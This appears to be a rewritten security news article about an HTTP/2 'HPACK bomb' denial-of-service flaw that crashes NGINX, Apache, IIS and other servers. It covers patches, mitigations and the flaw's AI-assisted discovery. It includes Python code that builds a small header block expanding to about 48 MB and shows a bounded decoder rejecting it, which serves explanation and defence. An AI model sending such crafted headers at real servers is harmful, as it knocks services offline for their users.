HTTP/2 Bomb Exploit Crashes NGINX, Apache, and IIS in Seconds — Proof-of-Concept Already on GitHub

A newly disclosed vulnerability in HTTP/2 server implementations — nicknamed the "HTTP/2 Bomb" and tracked as CVE-2026-49975 — allows an attacker to crash NGINX, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora in seconds, using a single system with a standard 100Mbps internet connection. Security firm Calif, which discovered the flaw using OpenAI Codex, published details on June 2, 2026. Public proof-of-concept Python scripts appeared on GitHub the same day.
The vulnerability is significant because HTTP/2 is negotiated by default in most modern HTTPS deployments rather than being an optional feature administrators routinely disable. Any server that accepts HTTP/2 connections with default settings is potentially exposed.
How the Attack Works
The HTTP/2 Bomb chains two techniques that individually exist in the research literature but had not previously been combined into a weaponized exploit. The first is a variation of an HPACK compression bomb: HPACK (RFC 7541) compresses HTTP/2 headers by letting a few bytes of compressed input reference a large entry in the decoder's dynamic table, so a small header block can decode to a header list orders of magnitude larger, consuming disproportionate memory on the receiving server. The second is a Slowloris-style hold: deliberately stalling the connection without completing the request so that the decoded header state is never released.
Together, these two techniques exploit a specific behavior in how HTTP/2 server implementations allocate and release memory during header processing. By sending crafted compressed headers and then holding each connection open without completing the request, an attacker causes rapid, progressive memory exhaustion on the server. Unlike volumetric DDoS attacks that require massive bandwidth, this exploit works with minimal throughput: Calif's researchers demonstrated crashes using just 100Mbps from a single machine.
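The HPACK half of the chain, as an added illustration written for this article rather than Calif's proof of concept or the exact trigger for CVE-2026-49975: a constructed 16 KB header block that decodes to about 48 MB, fed first to an unbounded decoder and then to one that enforces a ceiling on the decoded header list size while decoding. Function and class names (build_bomb, HpackDecoder, HpackBomb), the 4000-byte value and 12000-reference sample, and the omission of static-table lookups and Huffman strings are this example's own choices, not anything from the disclosure. The Slowloris hold is not modelled here.

```python
"""HPACK dynamic-table amplification and a bounded decoder (added example).

Illustrative code for this article: not the disclosed PoC, not the CVE trigger.
Static-table entries (RFC 7541 App. A) and Huffman strings are deliberately
left out; the bomb does not need them and a real decoder would add both.
"""

STATIC_TABLE_ENTRIES = 61          # count only; entries are not listed here
DEFAULT_DYNAMIC_TABLE_SIZE = 4096  # SETTINGS_HEADER_TABLE_SIZE default


class HpackBomb(Exception):
    """Decoded header list exceeded the configured ceiling."""


def encode_int(value, prefix_bits, flags=0):
    """RFC 7541 section 5.1 integer with an N-bit prefix."""
    mask = (1 << prefix_bits) - 1
    if value < mask:
        return bytes([flags | value])
    out, value = bytearray([flags | mask]), value - mask
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def decode_int(buf, pos, prefix_bits):
    mask = (1 << prefix_bits) - 1
    value, pos = buf[pos] & mask, pos + 1
    if value < mask:
        return value, pos
    shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def encode_string(data):
    """Raw string literal: H=0, 7-bit length prefix, then the octets."""
    return encode_int(len(data), 7) + data


def decode_string(buf, pos):
    huffman = bool(buf[pos] & 0x80)
    length, pos = decode_int(buf, pos, 7)
    if huffman:
        raise NotImplementedError("Huffman strings are outside this example")
    data = bytes(buf[pos:pos + length])
    if len(data) != length:
        raise ValueError("truncated string literal")
    return data, pos + length


def build_bomb(value_len=4000, refs=12000):
    """Constructed attacker block: one ~4 KB literal added to the dynamic
    table, then `refs` one-byte indexed references to it (index 62 is the
    first dynamic entry). About 16 KB in, about 48 MB out."""
    block = encode_int(0, 6, 0x40) + encode_string(b"x") + encode_string(b"A" * value_len)
    return block + encode_int(STATIC_TABLE_ENTRIES + 1, 7, 0x80) * refs


class HpackDecoder:
    def __init__(self, max_header_list_size=None, table_size=DEFAULT_DYNAMIC_TABLE_SIZE):
        self.max_header_list_size = max_header_list_size  # None = no ceiling (the weak setting)
        self.table_size, self.dynamic, self.dynamic_bytes = table_size, [], 0

    @staticmethod
    def entry_size(name, value):
        return len(name) + len(value) + 32  # RFC 7541 4.1 / RFC 9113 6.5.2 accounting

    def _lookup(self, index):
        if index == 0:
            raise ValueError("index 0 is not a valid reference")
        if index <= STATIC_TABLE_ENTRIES:
            raise NotImplementedError("static table lookups are outside this example")
        i = index - STATIC_TABLE_ENTRIES - 1
        if i >= len(self.dynamic):
            raise ValueError("reference beyond dynamic table")
        return self.dynamic[i]

    def _evict_to(self, limit):
        while self.dynamic and self.dynamic_bytes > limit:
            n, v = self.dynamic.pop()
            self.dynamic_bytes -= self.entry_size(n, v)

    def _add(self, name, value):
        size = self.entry_size(name, value)
        self._evict_to(self.table_size - size)
        if size <= self.table_size:
            self.dynamic.insert(0, (name, value))
            self.dynamic_bytes += size

    def decode(self, block):
        headers, decoded_size, pos = [], 0, 0
        while pos < len(block):
            b = block[pos]
            if b & 0x80:                       # indexed header field
                index, pos = decode_int(block, pos, 7)
                name, value = self._lookup(index)
            elif b & 0x40:                     # literal with incremental indexing
                index, pos = decode_int(block, pos, 6)
                name, pos = (self._lookup(index)[0], pos) if index else decode_string(block, pos)
                value, pos = decode_string(block, pos)
                self._add(name, value)
            elif b & 0x20:                     # dynamic table size update
                self.table_size, pos = decode_int(block, pos, 5)
                self._evict_to(self.table_size)
                continue
            else:                              # literal without indexing / never indexed
                index, pos = decode_int(block, pos, 4)
                name, pos = (self._lookup(index)[0], pos) if index else decode_string(block, pos)
                value, pos = decode_string(block, pos)
            decoded_size += self.entry_size(name, value)
            # The check that matters: abort on the running decoded size, before
            # the expansion is accumulated, rather than after the block is done.
            if self.max_header_list_size is not None and decoded_size > self.max_header_list_size:
                raise HpackBomb(f"decoded header list exceeds {self.max_header_list_size} bytes")
            headers.append((name, value))
        return headers, decoded_size


def demo():
    """Returns (compressed bytes, decoded field count, decoded bytes) for the unbounded case."""
    block = build_bomb()
    headers, size = HpackDecoder().decode(block)
    return len(block), len(headers), size


if __name__ == "__main__":
    n_in, n_fields, n_out = demo()
    print(f"{n_in} bytes in -> {n_fields} fields, {n_out} bytes out ({n_out // n_in}x)")
    try:
        HpackDecoder(max_header_list_size=65536).decode(build_bomb())
    except HpackBomb as e:
        print("bounded decoder:", e)
```

The constructed block fits in a single HEADERS frame at the default SETTINGS_MAX_FRAME_SIZE of 16384, so a server that only bounds the compressed size accepts it; the bounded decoder rejects it on the 17th field. SETTINGS_MAX_HEADER_LIST_SIZE is advisory to the peer (RFC 9113 section 6.5.2), so the ceiling has to be enforced locally during decoding, and per connection: the point of the Slowloris half is that whatever a server does allocate here stays allocated for as long as the attacker keeps the stream incomplete.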
What's Patched, What Isn't
As of June 6, two major server projects have released fixes. NGINX addressed the vulnerability in release 1.29.8. Apache HTTP Server patched it in mod_http2 version 2.0.41, and it is the mod_http2 fix that formally carries CVE-2026-49975. HAProxy is reported to be inherently resilient to this exploit, or can be configured to block it.
Microsoft IIS, Envoy, and Cloudflare Pingora had not released confirmed patches as of the June 2 initial disclosure. Envoy tracks a related issue as CVE-2026-47774. Administrators running these servers should monitor vendor advisories closely.
Mitigation Options
For organizations that cannot immediately update NGINX or Apache, Calif recommends three interim options. First, isolate exposed servers behind a reverse proxy, web application firewall (WAF), or Layer 7 load balancer with HTTP/2 protection enabled; HAProxy, properly configured, can absorb the attack. Note that a front-end proxy only helps if it bounds decoded header size and stalled connections itself, otherwise the exhaustion simply moves to the proxy. Second, disable HTTP/2 at the server level; clients fall back to HTTP/1.1, which costs performance but removes this attack surface entirely. Third, apply rate limiting on header processing at the ingress layer.
The OpenAI Codex Angle
Calif's disclosure notes that CVE-2026-49975 was discovered using OpenAI Codex as an analysis tool during a directed review of HTTP/2 server implementations. The finding adds to a growing pattern of AI-assisted vulnerability research: Claude Opus 4.8 was credited with finding the Zcash Halo2 double-spend bug disclosed last week. This is not a passive observation; it is an arms race dynamic. The same tools available to defensive researchers are available to offensive actors. Organizations running HTTP/2 servers should treat the public availability of PoC code as a meaningful escalation of exposure risk and prioritize patching accordingly.
Originally reported by The Hacker News. Read the original article for additional details.